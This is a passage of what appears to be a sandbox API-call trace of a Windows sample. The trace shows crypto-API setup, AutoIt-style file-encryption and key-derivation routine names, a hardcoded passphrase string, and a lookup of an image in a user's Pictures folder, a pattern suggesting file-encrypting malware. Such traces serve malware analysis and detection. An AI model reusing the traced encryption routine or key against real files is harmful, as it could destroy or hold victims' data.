(HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0092.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0092.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0092.026] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0092.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0092.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0092.026] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0092.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0092.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23d0 [0092.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0092.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0092.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0092.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0092.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2410 [0092.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0092.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0092.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0092.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0092.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0092.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0092.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0092.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dcf8 [0092.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2510 [0092.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0092.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0092.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0092.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2490 [0092.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0092.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0092.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f98 [0092.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0092.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0092.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0092.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0092.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0092.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0092.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0092.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0092.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0092.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0092.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0092.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0092.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0092.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0092.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0092.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0092.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0092.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0092.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0092.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0092.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0092.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0092.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0092.028] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0092.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0092.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0092.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0092.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0092.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0092.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0092.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0092.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0092.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0092.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0092.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0092.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0092.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0092.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0092.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0092.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0092.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0092.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0092.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0092.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0092.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0092.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0092.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0092.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0092.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0092.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0092.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0092.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0092.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0092.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0092.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0092.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0092.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0092.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0092.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0092.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0092.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0092.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0092.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0092.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0092.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0092.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0092.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0092.030] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\-3KPTEtzyngOb.bmp", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeffcc610, ftCreationTime.dwHighDateTime=0x1d5e2eb, ftLastAccessTime.dwLowDateTime=0x43e05300, ftLastAccessTime.dwHighDateTime=0x1d5e319, ftLastWriteTime.dwLowDateTime=0x43e05300, ftLastWriteTime.dwHighDateTime=0x1d5e319, nFileSizeHigh=0x0, nFileSizeLow=0x451, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="-3KPTEtzyngOb.bmp", cAlternateFileName="-3KPTE~1.BMP")) returned 0x41ac440 [0092.030] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0092.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0092.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0092.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0092.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0092.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0092.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0092.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0092.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0092.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0092.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0092.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0092.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0092.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0092.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0092.031] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0092.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5e0 [0092.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0092.031] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0092.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0092.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0092.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0092.031] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0092.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4d8 [0092.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0092.032] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0092.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0092.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0092.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0092.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0092.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0092.032] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0092.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0092.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0092.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0092.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0092.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0092.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0092.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0092.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0092.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0092.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0092.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0092.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0092.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0092.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0092.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0092.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0092.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0092.033] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0092.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0092.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26d0 [0092.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0092.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0092.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0092.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0092.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0092.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0092.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0092.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0092.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0092.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0092.034] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0092.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0092.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0092.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0092.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0092.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0092.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0092.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0092.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0092.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0092.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0092.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0092.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0092.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0092.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0092.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0092.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0092.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0092.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0092.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0092.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0092.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0092.035] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca508 [0092.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0092.035] PeekMessageW (in: lpMsg=0x144e7dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7dc) returned 0 [0092.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0092.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0092.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0092.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0092.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0092.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0092.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0092.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0092.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0092.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0092.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0092.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0092.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0092.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0092.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0092.036] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0092.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796fe8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0092.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0092.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0092.036] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0092.037] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0092.037] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0092.037] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0092.038] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0092.038] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0092.038] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0092.038] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.038] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0092.038] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0092.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caaa8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0092.038] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0092.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0092.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e27e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0092.038] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0092.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0092.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0092.038] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.038] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cabb0, cbMultiByte=14, 